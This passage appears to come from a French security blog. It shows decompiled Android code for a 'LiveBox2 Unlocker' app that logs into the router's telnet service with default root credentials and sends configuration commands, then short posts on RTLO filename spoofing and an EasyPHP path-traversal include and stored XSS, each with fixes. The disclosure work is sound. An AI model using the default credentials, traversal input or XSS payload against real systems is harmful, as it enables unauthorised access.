MenuItem localMenuItem1 = paramMenu.add(0, 0, 0,
localCharSequence1).setIcon(2130837504);
this.item = localMenuItem1;
CharSequence localCharSequence2 =
getResources().getText(2130968578);
MenuItem localMenuItem2 = paramMenu.add(0, 1, 1,
localCharSequence2).setIcon(2130837509);
this.item = localMenuItem2;
CharSequence localCharSequence3 =
getResources().getText(2130968579);
MenuItem localMenuItem3 = paramMenu.add(0, 2, 2,
localCharSequence3).setIcon(2130837515);
this.item = localMenuItem3;
this.menu0 = paramMenu;
return super.onCreateOptionsMenu(paramMenu);
}
protected void onDestroy()
{
super.onDestroy();
this.wifi = null;
this.example_adview.destroyDrawingCache();
this.example_adview.cleanup();
}
public boolean onMenuItemSelected(int paramInt, MenuItem
paramMenuItem)
{
boolean bool1 = super.onMenuItemSelected(paramInt, paramMenuItem);
boolean bool2;
switch (paramMenuItem.getItemId())
{
default:
bool2 = super.onMenuItemSelected(paramInt, paramMenuItem);
return bool2;
case 0:
AlertDialog.Builder localBuilder1 = new AlertDialog.Builder(this);
CharSequence localCharSequence1 =
getResources().getText(2130968582);
AlertDialog.Builder localBuilder2 =
localBuilder1.setMessage(localCharSequence1);
CharSequence localCharSequence2 =
getResources().getText(2130968580);
6 local6 = new DialogInterface.OnClickListener()
{
public void onClick(DialogInterface paramDialogInterface, int
paramInt)
{
paramDialogInterface.cancel();
}
};
AlertDialog.Builder localBuilder3 =
localBuilder2.setPositiveButton(localCharSequence2, local6);
localBuilder1.create().show();
case 1:
case 2:
}
while (true)
{
bool2 = super.onMenuItemSelected(paramInt, paramMenuItem);
break;
this.ok = false;
this.version = false;
Boolean localBoolean = Boolean.valueOf(false);
this.conectado = localBoolean;
onResume();
continue;
finish();
}
}
public boolean onMenuOpened(int paramInt, Menu paramMenu)
{
boolean bool = super.onMenuOpened(paramInt, paramMenu);
if (paramMenu != null)
{
this.menu0.clear();
Menu localMenu1 = this.menu0;
CharSequence localCharSequence1 =
getResources().getText(2130968577);
MenuItem localMenuItem1 = localMenu1.add(0, 0, 0,
localCharSequence1).setIcon(2130837504);
this.item = localMenuItem1;
Menu localMenu2 = this.menu0;
CharSequence localCharSequence2 =
getResources().getText(2130968578);
MenuItem localMenuItem2 = localMenu2.add(0, 1, 1,
localCharSequence2).setIcon(2130837509);
this.item = localMenuItem2;
Menu localMenu3 = this.menu0;
CharSequence localCharSequence3 =
getResources().getText(2130968579);
MenuItem localMenuItem3 = localMenu3.add(0, 2, 2,
localCharSequence3).setIcon(2130837515);
this.item = localMenuItem3;
}
return super.onMenuOpened(paramInt, paramMenu);
}
protected void onPause()
{
super.onPause();
this.wifi = null;
}
protected void onResume()
{
super.onResume();
this.example_adview.requestFreshAd();
this.table1.setBackgroundColor(-2097152);
this.txt.setText("");
this.txtads.setText("");
this.conectar.setEnabled(true);
this.conectar.setVisibility(0);
Drawable localDrawable1 = this.conectar.getBackground();
int i = Color.parseColor("#FF8000");
PorterDuff.Mode localMode = PorterDuff.Mode.MULTIPLY;
localDrawable1.setColorFilter(i, localMode);
this.easywifi.setEnabled(true);
this.easywifi.setVisibility(0);
this.donar.setEnabled(true);
this.donar.setVisibility(0);
this.lvb2pro.setEnabled(true);
this.lvb2pro.setVisibility(0);
this.version = false;
Boolean localBoolean1 = Boolean.valueOf(false);
this.conectado = localBoolean1;
this.estado = 0;
String str1 =
getResources().getConfiguration().locale.getISO3Language();
if (str1.equals("spa"))
{
Button localButton1 = this.donar;
Drawable localDrawable2 = getResources().getDrawable(2130837507);
localButton1.setBackgroundDrawable(localDrawable2);
this.spinner.setSelection(0);
}
while (true)
{
this.wifi = null;
WifiManager localWifiManager =
(WifiManager)getSystemService("wifi");
this.wifi = localWifiManager;
if (this.wifi.isWifiEnabled())
break;
if (isFinishing())
return;
if (this.wifi.getWifiState() == 2)
return;
this.txt.setText("");
this.table1.setBackgroundColor(-2039808);
TextView localTextView1 = this.txt;
StringBuilder localStringBuilder1 = new StringBuilder("\n\t");
CharSequence localCharSequence1 =
getResources().getText(2130968583);
String str2 = localCharSequence1 + "\n";
localTextView1.append(str2);
Button localButton2 = this.conectar;
CharSequence localCharSequence2 =
getResources().getText(2130968584);
localButton2.setText(localCharSequence2);
desactivarbotones();
return;
if (str1.equals("fra"))
{
Button localButton3 = this.donar;
Drawable localDrawable3 =
getResources().getDrawable(2130837506);
localButton3.setBackgroundDrawable(localDrawable3);
this.spinner.setSelection(1);
continue;
}
if (str1.equals("eng"))
{
Button localButton4 = this.donar;
Drawable localDrawable4 =
getResources().getDrawable(2130837505);
localButton4.setBackgroundDrawable(localDrawable4);
this.spinner.setSelection(0);
continue;
}
Button localButton5 = this.donar;
Drawable localDrawable5 = getResources().getDrawable(2130837507);
localButton5.setBackgroundDrawable(localDrawable5);
this.spinner.setSelection(0);
}
WifiInfo localWifiInfo = this.wifi.getConnectionInfo();
if (localWifiInfo.getBSSID() != null)
{
this.txt.setText("");
Boolean localBoolean2 = Boolean.valueOf(true);
this.conectado = localBoolean2;
TextView localTextView2 = this.txt;
StringBuilder localStringBuilder2 = new StringBuilder("\n\tESSID:
");
String str3 = localWifiInfo.getSSID();
String str4 = str3;
localTextView2.append(str4);
TextView localTextView3 = this.txt;
StringBuilder localStringBuilder3 = new StringBuilder("\n\tBSSID:
");
String str5 = localWifiInfo.getBSSID();
String str6 = str5;
localTextView3.append(str6);
TextView localTextView4 = this.txt;
StringBuilder localStringBuilder4 = new StringBuilder("\n\tIP: ");
int j = localWifiInfo.getIpAddress();
String str7 = ConvIP(j);
StringBuilder localStringBuilder5 =
localStringBuilder4.append(str7).append(" (");
int k = this.wifi.getDhcpInfo().gateway;
String str8 = ConvIP(k);
String str9 = str8 + ")\n";
localTextView4.append(str9);
int m = this.wifi.getDhcpInfo().gateway;
String str10 = ConvIP(m);
this.server = str10;
this.conectar.setEnabled(false);
this.conectar.setVisibility(8);
this.easywifi.setEnabled(false);
this.easywifi.setVisibility(8);
activarbotones();
if (!this.ok)
{
TableLayout localTableLayout = this.table1;
int n = Color.parseColor("#FF8000");
localTableLayout.setBackgroundColor(n);
TextView localTextView5 = this.txtads;
CharSequence localCharSequence3 =
getResources().getText(2130968581);
localTextView5.setText(localCharSequence3);
return;
}
this.table1.setBackgroundColor(-16733696);
this.txtads.setText("LiveBox2 Unlocker ... OK");
return;
}
this.txt.setText("");
this.table1.setBackgroundColor(-2039808);
TextView localTextView6 = this.txt;
StringBuilder localStringBuilder6 = new StringBuilder("\n\t");
CharSequence localCharSequence4 =
getResources().getText(2130968583);
String str11 = localCharSequence4 + "\n";
localTextView6.append(str11);
Button localButton6 = this.conectar;
CharSequence localCharSequence5 =
getResources().getText(2130968584);
localButton6.setText(localCharSequence5);
desactivarbotones();
}
protected void onStart()
{
super.onStart();
}
protected void onStop()
{
super.onStop();
this.wifi = null;
}
protected void professionnal()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set
wbm/settings/services/professionnal 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void reboot()
{
try
{
int i = Log.i("Buckynet LiveBox2 Unlocker", "LiveBox2 Unlocker ...
reboot");
String str1 = this.server;
int j = this.port;
Socket localSocket = new Socket(str1, j);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.user;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.pass;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("reboot");
String str7 = localBufferedReader.readLine();
this.ok = true;
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
this.ok = false;
StringBuilder localStringBuilder = new StringBuilder("LiveBox2
Unlocker ... ");
String str8 = localException.toString();
String str9 = str8;
int k = Log.e("Buckynet LiveBox2 Unlocker", str9);
}
}
protected void rtcphone()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set
wbm/settings/services/rtcphone 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
public void rundic()
{
new Thread()
{
public void run()
{
try
{
LiveBox2.this.ok = false;
LiveBox2.this.version = false;
LiveBox2.this.version();
LiveBox2 localLiveBox21;
String str1;
if (LiveBox2.this.posi == 0)
{
localLiveBox21 = LiveBox2.this;
str1 = LiveBox2.this.es;
}
LiveBox2 localLiveBox22;
String str2;
for (localLiveBox21.aa = str1; ; localLiveBox22.aa = str2)
{
if (LiveBox2.this.version)
{
LiveBox2.this.version = false;
LiveBox2.this.version0();
}
if (LiveBox2.this.version)
{
if (LiveBox2.this.estado == 1)
{
LiveBox2.this.reboot();
sleep(12000L);
}
if (LiveBox2.this.estado == 2)
{
LiveBox2.this.hsiab();
LiveBox2.this.livezoom();
LiveBox2.this.visio();
LiveBox2.this.community();
LiveBox2.this.fax();
LiveBox2.this.vpn();
LiveBox2.this.backuprestore();
LiveBox2.this.licence();
LiveBox2.this.log();
LiveBox2.this.dhcp();
LiveBox2.this.ftlock();
LiveBox2.this.tvrouted();
LiveBox2.this.h323();
LiveBox2.this.rtcphone();
LiveBox2.this.universal_phone();
LiveBox2.this.professionnal();
LiveBox2.this.wifipushbutton();
LiveBox2.this.wpspushbutton();
LiveBox2.this.msgwaiting();
LiveBox2.this.sipdev();
LiveBox2.this.fmdev();
LiveBox2.this.save();
}
}
boolean bool = LiveBox2.this.handler.sendEmptyMessage(0);
return;
if (LiveBox2.this.posi != 1)
break;
localLiveBox22 = LiveBox2.this;
str2 = LiveBox2.this.fr;
}
}
catch (Exception localException)
{
while (true)
{
LiveBox2.this.ok = false;
LiveBox2.this.dialog.dismiss();
StringBuilder localStringBuilder = new
StringBuilder("LiveBox2 Unlocker ... ");
String str3 = localException.toString();
String str4 = str3;
int i = Log.e("Buckynet LiveBox2 Unlocker", str4);
continue;
LiveBox2 localLiveBox23 = LiveBox2.this;
String str5 = LiveBox2.this.es;
localLiveBox23.aa = str5;
}
}
}
}
.start();
}
protected void save()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("save");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
localSocket.close();
int j = Log.i("Buckynet LiveBox2 Unlocker", "LiveBox2 Unlocker ...
OK");
this.ok = true;
return;
}
catch (Exception localException)
{
this.ok = false;
this.dialog.dismiss();
StringBuilder localStringBuilder = new StringBuilder("LiveBox2
Unlocker ... ");
String str10 = localException.toString();
String str11 = str10;
int k = Log.e("Buckynet LiveBox2 Unlocker", str11);
}
}
protected void sipdev()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/test/sipdev
1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void tvrouted()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set
wbm/settings/network/tvrouted 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void universal_phone()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set
wbm/settings/services/universal_phone 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void version()
{
while (true)
{
try
{
int i = Log.i("Buckynet LiveBox2 Unlocker", "LiveBox2 Unlocker
... Version");
String str1 = this.server;
int j = this.port;
Socket localSocket = new Socket(str1, j);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.user;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.pass;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("version");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
if (str10 != null)
continue;
this.version = false;
localSocket.close();
return;
String str11 = "LiveBox2 Unlocker ... " + str10;
int k = Log.i("Buckynet LiveBox2 Unlocker", str11);
if (str10.contains("Version:"))
{
this.version = true;
continue;
}
}
catch (Exception localException)
{
this.version = false;
this.dialog.dismiss();
StringBuilder localStringBuilder = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localException.toString();
String str13 = str12;
int m = Log.e("Buckynet LiveBox2 Unlocker", str13);
return;
}
boolean bool = false;
this.version = bool;
}
}
protected void version0()
{
while (true)
{
try
{
int i = Log.i("Buckynet LiveBox2 Unlocker", "LiveBox2 Unlocker
... Version");
String str1 = this.server;
int j = this.port;
Socket localSocket = new Socket(str1, j);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("version");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
if (str10 != null)
continue;
this.version = false;
localSocket.close();
return;
String str11 = "LiveBox2 Unlocker ... " + str10;
int k = Log.i("Buckynet LiveBox2 Unlocker", str11);
if (str10.contains("Version:"))
{
this.version = true;
continue;
}
}
catch (Exception localException)
{
this.version = false;
this.dialog.dismiss();
StringBuilder localStringBuilder = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localException.toString();
String str13 = str12;
int m = Log.e("Buckynet LiveBox2 Unlocker", str13);
return;
}
boolean bool = false;
this.version = bool;
}
}
protected void visio()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/pages/visio
1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void vpn()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/pages/vpn 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void wifipushbutton()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set
wbm/settings/services/wifipushbutton 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void wpspushbutton()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set
wbm/settings/services/wpspushbutton 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
public class MyOnItemSelectedListener
implements AdapterView.OnItemSelectedListener
{
public MyOnItemSelectedListener()
{
}
public void onItemSelected(AdapterView<?> paramAdapterView,
View paramView, int paramInt, long paramLong)
{
LiveBox2.this.posi = paramInt;
}
public void onNothingSelected(AdapterView paramAdapterView)
{
}
}
}
Et là, la fin d'un reve ... On constate que l'appli ouvre juste
une connexion telnet avec root en login et 1234 en password puis
exécute pleins
de commande pour activer toutes les fonctions et enfin lance un
reboot... Rien de nouveau quand on regarde Google.
Bref tout ca aurait été faisable avec un bete script python de 30 lignes. Décu :(
19-08-2011 23:03:26
[Secu] Falsification d'extension
Un petit trick qu'on m'a montré aujourd'hui pour piéger un
utilisateur. Plutot que de refaire une explication, je vous propose de
lire
ce pdf.
Ce caractère Unicode (RTLO) permet de falsifier les extensions des fichiers et de piéger des liens. J'ai pu tester sous Windows 7 ainsi que sous Linux Ubuntu avec Nautilus et cela fonctionne très bien pour les 2 OS.
Soyez donc prudent car de nombreux malwares doivent utiliser cette technique.
Ce caractère Unicode (RTLO) permet de falsifier les extensions des fichiers et de piéger des liens. J'ai pu tester sous Windows 7 ainsi que sous Linux Ubuntu avec Nautilus et cela fonctionne très bien pour les 2 OS.
Soyez donc prudent car de nombreux malwares doivent utiliser cette technique.
20-07-2011 00:31:36
[Secu] Faille include + XSS permanente sur EasyPHP
2 petites vulnérabilités présentes dans la partie
d'administration de EasyPHP (testé sur la dernière version
5.3.6.1) :
Tout d'abord une faille include présente dans le fichier <Installation de EasyPHP>\home\i18n.inc.php
En effet on peut voir le code suivant :
Une 2e vulnérabilité est une XSS permanente sur la page d'admin (home) très utile pour faire une blague à un collègue lors d'une présentation devant un client :)
Rien de plus simple à mettre en place, il suffit de créer un répertoire dans www/ nommé par exemple :
Tout d'abord une faille include présente dans le fichier <Installation de EasyPHP>\home\i18n.inc.php
En effet on peut voir le code suivant :
if (isset($_POST['lang']) AND $_POST['lang'] != $lang)
{
$fp = fopen($filename, "r");
$ini_contents = fread($fp, filesize($filename));
fclose($fp);
$ini_contents = str_replace("LangAdmin=".$lang,
"LangAdmin=".$_POST['lang'], $ini_contents);
$fp = fopen($filename, "w");
fputs($fp,$ini_contents);
fclose($fp);
Header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
include("i18n/" . $lang . ".php");
On constate donc que si l'on envoie une requete POST avec en variable
lang=../../../repertoire/page on pourra alors écrire dans le
fichier de config puis l'inclure.
Pour rendre le code plus propre, il suffit de suivre les conseils
de MadIrish.
Une 2e vulnérabilité est une XSS permanente sur la page d'admin (home) très utile pour faire une blague à un collègue lors d'une présentation devant un client :)
Rien de plus simple à mettre en place, il suffit de créer un répertoire dans www/ nommé par exemple :
pwet' onmouseover=alert(42) lPour la corriger, il suffit d'ouvrir le fichier <Installation de EasyPHP>\home\index.php et de corriger la ligne 71 en mettant :
$www_files[] = addslashes($file);L'équipe de EasyPHP a été prevenue sans réponse à ce jour.
12-07-2011 01:29:24
[Coding] Bug argument cal de Nanoblogger
